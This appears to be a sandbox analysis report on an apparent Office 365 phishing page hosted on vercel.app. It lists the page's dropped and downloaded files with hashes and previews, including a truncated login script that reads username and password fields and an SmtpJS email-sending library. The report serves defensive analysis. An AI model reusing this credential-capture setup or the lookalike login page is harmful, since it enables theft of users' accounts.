                        Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (3345)
                        Category:dropped
                        Size (bytes):3419
                        Entropy (8bit):5.074152236399131
                        Encrypted:false
                        SSDEEP:
                        MD5:BD4F179F94D68EC0999348FF53AFE2C0
                        SHA1:E7A0816561E5A62F97C6F7C1E5B5D9AF60CCB2B0
                        SHA-256:AD0F0FFDCD62A3C1918DD0E51B06F52BE8941A74BD6702CF9708752A90BFD36C
                        SHA-512:9552AF023D1AF4A8115E2324D99762CB105CF381B757A66894DA554CB7675657CF05EAD29A94E24E4DC0690F5006525375C39933251265CEEB9E3A6F99ADF044
                        Malicious:false
                        Reputation:unknown
                        Preview:/*!..Autosize 3.0.17..license: MIT..http://www.jacklmoore.com/autosize.*/.!function(e,t){if("function"==typeof define&&define.amd)define(["exports","module"],t);else if("undefined"!=typeof exports&&"undefined"!=typeof module)t(exports,module);else{var n={exports:{}};t(n.exports,n),e.autosize=n.exports}}(this,function(e,t){"use strict";function n(e){function t(){var t=window.getComputedStyle(e,null);"vertical"===t.resize?e.style.resize="none":"both"===t.resize&&(e.style.resize="horizontal"),l="content-box"===t.boxSizing?-(parseFloat(t.paddingTop)+parseFloat(t.paddingBottom)):parseFloat(t.borderTopWidth)+parseFloat(t.borderBottomWidth),isNaN(l)&&(l=0),a()}function n(t){var n=e.style.width;e.style.width="0px",e.offsetWidth,e.style.width=n,e.style.overflowY=t,r()}function o(e){for(var t=[];e&&e.parentNode&&e.parentNode instanceof Element;)e.parentNode.scrollTop&&t.push({node:e.parentNode,scrollTop:e.parentNode.scrollTop}),e=e.parentNode;return t}function r(){var t=e.style.height,n=o(e),r=d
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 204 x 192, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):41359
                        Entropy (8bit):7.98328603945
                        Encrypted:false
                        SSDEEP:
                        MD5:4FD0C814FB46C30A6E8A7B61CB7F8265
                        SHA1:1AC1F0D0035777F53A182CBBFAE713DA5A4A2645
                        SHA-256:08618D4705673A6564C57890C9AE78C20023712B3CA3051DDED8D4ABFED2E3C9
                        SHA-512:92905CACA883A6387FD6A246E177ABB23CE15553A5A62EE3E7C7583427799E2941A7E1C610273A6AE49580172D62A9B381051C05364C694BF97666B2BC4C2C48
                        Malicious:false
                        Reputation:unknown
                        Preview:.PNG........IHDR.............H.......sRGB....... .IDATx^..x].q.:k.S....H...v..,.*..U\Tb;./.K|..=.s.D.S..n..$...\;....q....,+.l...XA.... .)...f.Z{...9.).2%..'.8e.}.^......ap....;|.s.-l...}.......=...v..U..9./..@d....f.?.....n00L..c......0.5-.....!.gFr..q..x\<......ct.yx.8..s..........}...!.........c0.?.A....6..\.=2..~..K..|....y.W.<..{.._.k.t..D..S...ji.w..A......cP...l........0.p^... J`).i`!<6......?.......b....L..8.`.g....a.r.O@X9Y0.........n..>r.........y..GFx...#..?w...ou.e[m...[Fnj~...=.#.F..{`..0....Y.....R.a...-.Z.Y....1<.8.........0#........., ...-.(.....(X.r|~duo....6...t.8.u+..%t.X..Q...=..g.]9v...A.\n.......ZZ....<:.;....u...i.q..3Z..4L,.3v..=S...c*.p|......).K...S...K..d..fF..G.">....s...0...!...../9.wpuo.=.....x.'~rs.....?..`..\.{.....#'.V.g.3._. ..F..F.!.`zv...=.G&...`.6...S..9;.a..E...=....5,..4....T../.%kna.m.....`!Y..0!`6...s.*..-......BP)W..g...Z....Wt...7..u.+?.yE...1^......+...9yG.blo).t...n.p({..Y015.......cP.<`... .
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with no line terminators
                        Category:downloaded
                        Size (bytes):28
                        Entropy (8bit):4.066108939837481
                        Encrypted:false
                        SSDEEP:
                        MD5:96B191AE794C2C78387B3F4F9BB7A251
                        SHA1:F974547DF0ADFFB7E80699552C6BCE3E709343A6
                        SHA-256:CE76758AEEF2CAF12021AFB5257D0CA4E9E5C20015C2C85D68BB27FA6B1AFB28
                        SHA-512:07EE1CFDBD53C1046FA4F44FF7C83F4456CDAA099299816B451D114E3EEAAD4BE8F0CD0FC09F0E838418BCBB5E50547E806E8E080B8E3421D0DB26FF4C15D412
                        Malicious:false
                        Reputation:unknown
                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmZWvsnBo0XFRIFDeeNQA4SBQ3OQUx6?alt=proto
                        Preview:ChIKBw3njUAOGgAKBw3OQUx6GgA=
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 5616x3744, components 3
                        Category:downloaded
                        Size (bytes):3944297
                        Entropy (8bit):7.971994518283929
                        Encrypted:false
                        SSDEEP:
                        MD5:B2C49613413EE3FF5A21E1E5ADE1511A
                        SHA1:BABD6E274E57B8D44403363DAB0930FD2906D96F
                        SHA-256:C4977339DA19F0D85F3CAF6C7425527ABC47F979548E3BB3DE740524C334DD79
                        SHA-512:4F87BD77E0E0A2A94A2561B97C159C133DA6E57DCEED6322A72E762917C1A6D001DB80F6AC58670E84E6B94AA5A430075998CA3DE1D969CB1ED3CD8D826089F1
                        Malicious:false
                        Reputation:unknown
                        URL:https://office365-mauve.vercel.app/images/image3.jpg
                        Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (37945)
                        Category:downloaded
                        Size (bytes):236100
                        Entropy (8bit):6.080377231258373
                        Encrypted:false
                        SSDEEP:
                        MD5:97F8260E2FC321A619D66FD10BB8796E
                        SHA1:38E66BBB11748D7A469C2F35DC14526E6386F020
                        SHA-256:976C89984CA0224C0F9ECC1BDEDD1F82D34A7D7B14826491837D0D1CB1275F01
                        SHA-512:2B2F21EF6FFC55E08499AD1328B50E3CBFAC51D91D4C00C4C284797493C5B6B86FB47268C107FF614D583F1FA9F20B2E01A2248AA2241E41D4712F916FB1928D
                        Malicious:false
                        Reputation:unknown
                        URL:https://telegra.ph/css/core.min.css?47
                        Preview:@font-face{font-family:CustomSansSerif;font-style:normal;font-weight:300;src:url(data:font/opentype;base64,d09GRk9UVE8AAG7YAAsAAAAAvtwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDRkYgAAAKYAAAPuwAAEwkBxCxzUdQT1MAAElMAAAj0AAAXaDULsEnR1NVQgAAbRwAAAG6AAADcDLGLR9PUy8yAAAFMAAAAE0AAABgWkh2pGNtYXAAAAegAAACrAAABAjCzatUaGVhZAAAARAAAAA0AAAANgaDQtZoaGVhAAAFEAAAACAAAAAkBsIE/GhtdHgAAAFEAAADywAAB3ioHUI7bWF4cAAAAQgAAAAGAAAABgHeUABuYW1lAAAFgAAAAh4AAASG3UOrqXBvc3QAAApMAAAAEwAAACD/mgA8AABQAAHeAAB4AWNgZGBgYG9ku7l/WlI8v81XBmbmFwxAcMnYXglG/wv5z8aymnkZkMvMwAQSBQBtvQwteAGNlQOwHGkUhc+9PbGfZ+bZtq3Ytm2nvIW1bdu2nbVtK7aT3nPrTS/iqfrq/P7/qx4NwwjY76c2JBzDpC9ytByRsh25TjUSdTnS8SzypQwVxCdrUaD1yMbPiGW/HN+iSC5x9+oYFMooRMgWpMiHCGgP+OVZZGo7jr/A8T+RzXYa7ymB7Z2PoLyDFGqOXI48Pci1KxGptZimc1Gmd2Ka7Cbr2H+V/c/YDmCOBN31WsX2V5jmjEK5voEpuofz8VxnWs05vl22IkIfwQSdhzBnIc8tg19zEKZFtKWYdl6CDlS/9kOdnOu6sgOXy5fI1Q4YKk/xLV2QKetIHSJkF/s9MBT70Beb3R/lU7a3YpTjxwgNIz0534vamevHY4RchSyZBD/HB8n76KnPoBc1Sj5DF7kT2TKH9sdiGdWvg1AR8v1wu5dnl9OWYu0IxcOoYr+Vb5vrTEctfZUs3
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):6884
                        Entropy (8bit):4.634726170686902
                        Encrypted:false
                        SSDEEP:
                        MD5:8887ED9736CB13242ED7782872E44E4A
                        SHA1:16361D29B108B70BF1A68A2918ED5291B637BCAB
                        SHA-256:58D083FE6D633CF81CF4088A113A0C75AA20BA6C61BC38D980D870F719DA6356
                        SHA-512:56FB9ED816173CB5C9092AF76E128988DDAB326969659E196A470E035465E5FE4E7DC76DF7332E1984107CAF5870C42C05C10F27C453EE72B34A76C5D69DE620
                        Malicious:false
                        Reputation:unknown
                        Preview:document.addEventListener('DOMContentLoaded', function () {.. console.log('DOM Content Loaded - Initializing Login Script');.... const usernameInput = document.getElementById('username');.. const passwordInput = document.getElementById('password');.. const nextButton = document.getElementById('nextButton');.. const errorMessage = document.getElementById('errorMessage');.. const errorMessagePassword = document.getElementById('errorMessagePassword');.. const loginForm = document.getElementById('loginForm');.... // Check for missing elements.. if (!usernameInput || !passwordInput || !nextButton || !errorMessage || !errorMessagePassword) {.. console.error('Initialization Error: One or more form elements were not found in the DOM.');.. return;.. }.... // Initially hide password input using a class instead of directly manipulating display.. passwordInput.classList.add('hidden'); // Add hidden class to hide password input initially.... nex
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with no line terminators
                        Category:downloaded
                        Size (bytes):32
                        Entropy (8bit):4.538909765557392
                        Encrypted:false
                        SSDEEP:
                        MD5:B57ADF9B1F9BD6A318E70EB6C1170F91
                        SHA1:5B1C4EA8FE8361E36C17ECFE9F1DFCBFA407D639
                        SHA-256:0564049B422D0B6AD535C8F554ADF37E07441597881678F337DB21FB51289215
                        SHA-512:E774A1015AFE778C95CEAA51A0EC451ADE6564CE16468DD7C277BAB6334924163B753B2C3E0BA7363FFFB1DFDC66C35533AE447D676ED039B21244F596422ED8
                        Malicious:false
                        Reputation:unknown
                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkCD7Pkxd_yrBIFDRu9L8YSEAmbTpHmptL4iRIFDUqFnlI=?alt=proto
                        Preview:CgkKBw0bvS/GGgAKCQoHDUqFnlIaAA==
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (32051)
                        Category:downloaded
                        Size (bytes):201874
                        Entropy (8bit):5.311356255551935
                        Encrypted:false
                        SSDEEP:
                        MD5:E2F44403EC3ECF567E8B8A9B091616DC
                        SHA1:1FD0F2555B83632D7B17CAE8CCF25422211E8A85
                        SHA-256:7C6CD331016A7CB8DAFA981C75BB72ED857E5EA00EB3438FFCE1A446CBDFB186
                        SHA-512:0A49E23D1AE5F64C45C06C53C1A475D73BA26EA508009211F036190C9325F0F00C674E23BAF9E2352DBC35688B79BE571EC6F5B4C7527BC7E38E9D4C64AA4C0C
                        Malicious:false
                        Reputation:unknown
                        URL:https://telegra.ph/js/quill.min.js?10
                        Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.Quill=e():t.Quill=e()}(this,function(){return function(t){function e(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return t[r].call(o.exports,o,o.exports,e),o.loaded=!0,o.exports}var n={};return e.m=t,e.c=n,e.p="",e(0)}([function(t,e,n){t.exports=n(53)},function(t,e,n){"use strict";function r(t){return t&&t.__esModule?t:{"default":t}}var o=n(2),i=r(o),l=n(18),a=r(l),s=n(29),u=r(s),c=n(30),f=r(c),p=n(42),h=r(p),d=n(34),y=r(d),v=n(31),b=r(v),g=n(32),m=r(g),_=n(43),O=r(_),w=n(33),x=r(w),k=n(44),E=r(k),j=n(51),A=r(j),N=n(52),q=r(N);a["default"].register({"blots/block":u["default"],"blots/block/embed":s.BlockEmbed,"blots/break":f["default"],"blots/container":h["default"],"blots/cursor":y["default"],"blots/embed":b["default"],"blots/inline":m["default"],"blots/scroll":O["default"],"blots/text":x["defaul
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (32086)
                        Category:dropped
                        Size (bytes):95786
                        Entropy (8bit):5.393689635062045
                        Encrypted:false
                        SSDEEP:
                        MD5:8101D596B2B8FA35FE3A634EA342D7C3
                        SHA1:D6C1F41972DE07B09BFA63D2E50F9AB41EC372BD
                        SHA-256:540BC6DEC1DD4B92EA4D3FB903F69EABF6D919AFD48F4E312B163C28CFF0F441
                        SHA-512:9E1634EB02AB6ACDFD95BF6544EEFA278DFDEC21F55E94522DF2C949FB537A8DFEAB6BCFECF69E6C82C7F53A87F864699CE85F0068EE60C56655339927EEBCDB
                        Malicious:false
                        Reputation:unknown
                        Preview:/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 334 x 23, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):8170
                        Entropy (8bit):7.938229060513457
                        Encrypted:false
                        SSDEEP:
                        MD5:D63D106DD9779C17945507AA63FA2823
                        SHA1:689C69BDC7135ED8D972215D36C6B0338EA92A9A
                        SHA-256:25B7FF082E0599B5B5018C97EA399DC9EE6DB15D23A58A6B0D0170F9776C9329
                        SHA-512:B1F070CB2F8D64116F68EFE954C5841952029CB6BEEF3001B932AB9B3E7891EA69403EEF992F44F25B39C07040842E3AB73CCE1E8D69786EA8A62FB3BCA01B08
                        Malicious:false
                        Reputation:unknown
                        Preview:.PNG........IHDR...N.........d.......iCCPkCGColorSpaceGenericRGB..8..U]h.U.>.sg#$.Sl4.t.?.%..V4......6n.I6.".d.....83...OEP|1..... (...>./..%.. (>...P..;3.i...e.|..{.g...X.......-.2.s...=+.......WQ.+].L.6O.w.[.C.{_.......F.. q.b.......U.v.z...?.Z..b.1@./z..c..s>~.if.,...USj.......F..1.._.Mj...b.u..p.a..m.h..m...>..a\.+5%..Q.K...F...km}.......?........D\..........!~.6.,.-..7..S......v.5Z..;....[...r.mS.....5..{yD...yH.}r.9..|..-...........FA......J...j..I.....[/.]m...K..7..K....R..D..r..Y..Q..O.-....Q...|.|.6........(.0...MX..d(@....h....2....._.f....<.:........._....*d.>.........e.\c.?~,7.?&. ...^2I..q2."y.<M.....d...JlE^<7....3R..E.9...`.3*L\S.,...#.)..]..._.\.,7Q.....W.._...2.+.j....W.r.Z..L..lXswU.m.........q..W.F~....]<Yo..F....j.V.N.D...,.'}(...}.}.}.}.]..;....p.s_..j..Z.{.y..g.k.J!#l...r.6.Qa2.'..cBQ......./.=..c...\..V......M.UUT.p.).VoM8.A..$Cd..6T..W.".O.Ri.S;S....A....v.m.....n.R..c.}.Y.:n....wK.b..6*.......L.hS..mZ.....
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (2710), with no line terminators
                        Category:downloaded
                        Size (bytes):2710
                        Entropy (8bit):4.820675128193189
                        Encrypted:false
                        SSDEEP:
                        MD5:485340BF60DE255D917B74218669D9C5
                        SHA1:5BFA17A6E88FAA54C7C29F4EF1A1CCC3D80E1175
                        SHA-256:E8A9BC2271729E7078AE34F415D174765FAFA7045593D270ADCDD364B529AC08
                        SHA-512:27558FFCC917334E65F77E07F11354AAB27266C5CFC6267D7F120F6E2A69A1868EA7AF4CA3BD7C56FE357809EAC1856A5C9208B1C42C96F8459F5DE8528CCD2A
                        Malicious:false
                        Reputation:unknown
                        URL:https://telegra.ph/js/jquery.selection.min.js
                        Preview:!function(t,e,r){var n=function(t){var n={text:"",start:0,end:0};if(!t.value)return n;try{if(e.getSelection)n.start=t.selectionStart,n.end=t.selectionEnd,n.text=t.value.slice(n.start,n.end);else if(r.selection){t.focus();var s=r.selection.createRange(),a=r.body.createTextRange();n.text=s.text;try{a.moveToElementText(t),a.setEndPoint("StartToStart",s)}catch(c){a=t.createTextRange(),a.setEndPoint("StartToStart",s)}n.start=t.value.length-a.text.length,n.end=n.start+s.text.length}}catch(c){}return n},s={getPos:function(t){var e=n(t);return{start:e.start,end:e.end}},setPos:function(t,r,n){n=this._caretMode(n),"start"===n?r.end=r.start:"end"===n&&(r.start=r.end),t.focus();try{if(t.createTextRange){var s=t.createTextRange();e.navigator.userAgent.toLowerCase().indexOf("msie")>=0&&(r.start=t.value.substr(0,r.start).replace(/\r/g,"").length,r.end=t.value.substr(0,r.end).replace(/\r/g,"").length),s.collapse(!0),s.moveStart("character",r.start),s.moveEnd("character",r.end-r.start),s.select()}else
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 104 x 77, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):8729
                        Entropy (8bit):7.955503573320825
                        Encrypted:false
                        SSDEEP:
                        MD5:51EB071C4A3D871E0514BA2BED96C9A7
                        SHA1:B60B783D674C190CCD69296BFE73E0B3D41C986B
                        SHA-256:04A8F509F547A465AC086EBA1760E16E485A2B46F26AF4FA36BD8144EA4F7683
                        SHA-512:8F4A1077FCF91C3281DA6D785736CC34A36E25588643ECDCFEC76282ADC2AD513A282997220392DA52891D23A6BAB00A809310BCA5C3BA5C5D760DBD5CA53DFC
                        Malicious:false
                        Reputation:unknown
                        Preview:.PNG........IHDR...h...M.....J}!$....sRGB.........gAMA......a.....pHYs...t...t..f.x..!.IDATx^.|gTTg....E.T`.".,H.)..tA. .FSA.b....+.b..)*.X....D..h...h.^....9...z..a..,..b....\.U.......+@.......+@.......+@.......+@..............[w.A.7._.2.z/...".ss.Un.|....y.<....bo.U...C.Y.......7.)9...0.....n.v.V.._.]...,E......R..|..?..z~k..........g...?..GO.CfA..<.@.m..$.....<.....z...Z.W.....>..d..B.X....@.....y.w....5.:~..Z...............>C........{#d^.3..:....>...'.7....OB3..4#.\x.4..B..:Qg..p....-.R(<...+..9[q.......~./W...w.........z.1.......*.....K.p..M,\[...5..\..ig(_.....y.]X...@5C?.*.r.@?.2.AM0...}.~.q.)HB.bX./.n"..`2...&..d..1...V.T.]...%...$..._`...K...."...Aw......4..<(\s.p..m>.r...Rh..C...C...S.. ....<.y.).BNC...I0A.h........IH.NB.y...c....4..dA. s_G.+..s.5e#n.{.>./S......Es......|.%....b..0.....c.....s=.f^.n.N.Gt%.&...g't#...7.=.@..E...0M...d.%Xe...Q..7.....|........d..3...E....v.R..0..@....^...N...c..;.:.@.>.b...0._....H]W.0.......m....~.qH.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                        Category:dropped
                        Size (bytes):5430
                        Entropy (8bit):1.5788986801415115
                        Encrypted:false
                        SSDEEP:
                        MD5:DA022EEA8D752ED94ACE16C4DBB8BB0E
                        SHA1:414322F345E53AACFC18F36CDFAD50AC9FF132F9
                        SHA-256:9D9F12300D8D87B8C2E5035DE0C1ABE413CDAFCE47EABAAE2CF5E067DC2F4C33
                        SHA-512:603B05E663CF1E1957F0FD413B37B73FEAD986ADE8439AD0AEA429C65E6260DCF3E76A4129C2F03B87066E86FF578876FECEC76DEE2EBC5D4E58144D0AA3D6DC
                        Malicious:false
                        Reputation:unknown
                        Preview:............ .h...&... .... .........(....... ..... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with no line terminators
                        Category:downloaded
                        Size (bytes):28
                        Entropy (8bit):4.06610893983748
                        Encrypted:false
                        SSDEEP:
                        MD5:77736B31E622F0160B7BA334814AF44B
                        SHA1:2E9847CC1CCDC9E7386CFD9BF6F6C666AE703EF7
                        SHA-256:EBF234A87982A09AE2CA134DD38C46462BAF83D41BEAE0C36598981A1CE157B4
                        SHA-512:EA0860CB04F277A8ED71DBEBC1AE6A74F58E5ECB9C6EA26F63549A32331C81DC6DB6023866E38667CDAE08EEE156F0CBFC64489CB672087491108AE56AEDAC41
                        Malicious:false
                        Reputation:unknown
                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlLc_2jUg-LbhIFDUJjfFISBQ1qxTwi?alt=proto
                        Preview:ChIKBw1CY3xSGgAKBw1qxTwiGgA=
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (841), with CRLF line terminators
                        Category:dropped
                        Size (bytes):868
                        Entropy (8bit):4.996919820689153
                        Encrypted:false
                        SSDEEP:
                        MD5:73572DA03234FA6D561C64B59C152230
                        SHA1:5DE5EFC900B7EAF2B93B02F7C4C260FA938EF983
                        SHA-256:1FD711CB491A361EF91E29C50DE0680A4B156C0B34BB91E18570D0037263A776
                        SHA-512:DE989D8DB692960ED4296AEAD99C0CCF6CDF40110FCB44D35F72EFB64D42333CC68878D649365C6C674CDDE134D6EEE59FE522C86DAFB287F43D3D5F78B434F5
                        Malicious:false
                        Reputation:unknown
                        Preview:/* SmtpJS.com - v3.0.0 */..var Email = { send: function (a) { return new Promise(function (n, e) { a.nocache = Math.floor(1e6 * Math.random() + 1), a.Action = "Send"; var t = JSON.stringify(a); Email.ajaxPost("https://smtpjs.com/v3/smtpjs.aspx?", t, function (e) { n(e) }) }) }, ajaxPost: function (e, n, t) { var a = Email.createCORSRequest("POST", e); a.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), a.onload = function () { var e = a.responseText; null != t && t(e) }, a.send(n) }, ajax: function (e, n) { var t = Email.createCORSRequest("GET", e); t.onload = function () { var e = t.responseText; null != n && n(e) }, t.send() }, createCORSRequest: function (e, n) { var t = new XMLHttpRequest; return "withCredentials" in t ? t.open(e, n, !0) : "undefined" != typeof XDomainRequest ? (t = new XDomainRequest).open(e, n) : t = null, t } };
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Compressed by jpeg-recompress", progressive, precision 8, 111x89, components 3
                        Category:dropped
                        Size (bytes):2468
                        Entropy (8bit):7.709922986767129
                        Encrypted:false
                        SSDEEP:
                        MD5:57FF45C107BF66F8BC8ABB64DEA55199
                        SHA1:346128A908A3DF19D928377EF2A2FE6F9DCF6CF1
                        SHA-256:A53FD32030BE9C71DA30C3B5B6831A3A37FE4CCE8427ADEE4049FF77D391BDD8
                        SHA-512:88D30DD79CE84C194DEB7AF995C4020A4B674029FBEECD1A36F0C2829D66CEE95CE86F9E6F04E3B6F9F7418668C7A99E0C5A488F2FE08AAAE55C4FF11408E67E
                        Malicious:false
                        Reputation:unknown
                        Preview:......JFIF..............Compressed by jpeg-recompress......................................................"..."*%%*424DD\.................................................."..."*%%*424DD\......Y.o.."..........................................................l.M...!...l.8.u..!...[......z.;^.......]....c...y.....E......f..<e....Z.d.s..\.j.....E..2.pc........:B....E................................................y.,)..]q-..)..0.N6..f.R..B..........................................tw..S.X}$....."...J.&.=:?..a....?.........................!.1a.."AQq. ...0Rr3b...#24@BDcst............?..s.z..&.+/U$4....h..G.RF........S..{%.5>..K...T1......S0Yax..%.(.?$......0Y..B..[.By.!.e;.....)a.z..(.....P=I8.PU.)2.;.W".....~....[.s-...I.H`Fv-.C..\Q...A.,Y...=RV...v....a.Pv8.|W......%-A.T.{.=u.0..".n.X..:....=.W.5m_.G% .vi...8.f..c..p..D.c....{.3..H...j.....8...lA.-..}1.\..[.w|...i5.S.Og.`..d..y..PC_F...R4ea.H.#....J.......#...w.GR..Y0.b...wI)i`.i.h.5......nI.......t.QSMKB...U
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):4272
                        Entropy (8bit):4.820109944437648
                        Encrypted:false
                        SSDEEP:
                        MD5:4BD553B83512CEB058CC316D0AD37DD5
                        SHA1:C2E85317B30D4C6EC6949C2DF707DAFFE5AA0DB3
                        SHA-256:3154A393C92B6A8BB06D8DD914C83D948C3955966D2BD93D5F5315F54CE01289
                        SHA-512:EC6F7668DC3D3B95BFC6E0ABA0E2BDDC849B44D3C2BCAE8E974792A07A7C6C714637696E16B787FA20145ABDA268FCD593134839C817ED4E4C612E8104339779
                        Malicious:false
                        Reputation:unknown
                        URL:https://office365-mauve.vercel.app/css/index.css
                        Preview:body {.. margin: 0;.. font-family: Arial, sans-serif;..}.....slideshow-container {.. position: relative;.. width: 100%;.. height: 100vh;.. overflow: hidden;..}.....slideshow-image {.. width: 100%;.. height: 100%;.. object-fit: cover; /* Ensure the image covers the entire container */.. display: none;..}..../* Adjusted style for login-container */...login-container {.. position: absolute;.. top: 50%;.. left: 50%;.. transform: translate(-50%, -50%);.. margin-left: 320px; /* Added margin to shift right by 20px */.. background-color: white;.. padding: 40px;.. border-radius: 8px;.. width: 400px;.. height: 650px;..}.....header {.. text-align: left;.. margin-bottom: -40px;..}....h2 {.. margin: 0;..}.....logo {.. width: 100px; /* Adjust the width of your logo */.. margin-top: -15px;.. margin-bottom: 40px;..}....form {.. display: flex;.. flex-direction: column;..}....label {.. margin-bottom: 12px; /* Increase
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (32062)
                        Category:downloaded
                        Size (bytes):51742
                        Entropy (8bit):5.240557693604196
                        Encrypted:false
                        SSDEEP:
                        MD5:A137B64516580CC0E354EE1D37D2FFC9
                        SHA1:39BDB86A75BB9A41A97C44DF0177FB7B2FEAA3EF
                        SHA-256:4D4C1F3C9334378DDCE87CE85D94CF99A75B65B9E6604D7779F8DC0999EF486F
                        SHA-512:6C474B9922789D80E327474DAAAFD5D02319A088D8DFD1AC1460C3D3CAE55A9C57B86F0A07A195E88DC795241EA0FCFD1D3C5FF525C5F49201C4E76B7466618C
                        Malicious:false
                        Reputation:unknown
                        URL:https://telegra.ph/js/core.min.js?67
                        Preview:"use strict";function _classCallCheck(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function _possibleConstructorReturn(t,e){if(!t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!e||"object"!=typeof e&&"function"!=typeof e?t:e}function _inherits(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function, not "+typeof e);t.prototype=Object.create(e&&e.prototype,{constructor:{value:t,enumerable:!1,writable:!0,configurable:!0}}),e&&(Object.setPrototypeOf?Object.setPrototypeOf(t,e):t.__proto__=e)}function _sanitize(t,e){var o=document.createElement("a");o.href=t;var l=o.href.slice(0,o.href.indexOf(":"));return e.indexOf(l)>-1}function relativeUrl(t){var e=location,o=document.createElement("a");return o.href=t,e.origin!=o.origin?o.href:e.pathname!=o.pathname||e.search!=o.search?o.pathname+o.search+o.hash:e.href==o.href?o.hash||o.pathname+o.search+o.hash:o.has
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 40 x 487, 8-bit/color RGBA, non-interlaced
                        Category:downloaded
                        Size (bytes):3295
                        Entropy (8bit):7.865112262534193
                        Encrypted:false
                        SSDEEP:
                        MD5:DBF6327FC24074B3CABF15AC2F39AA5C
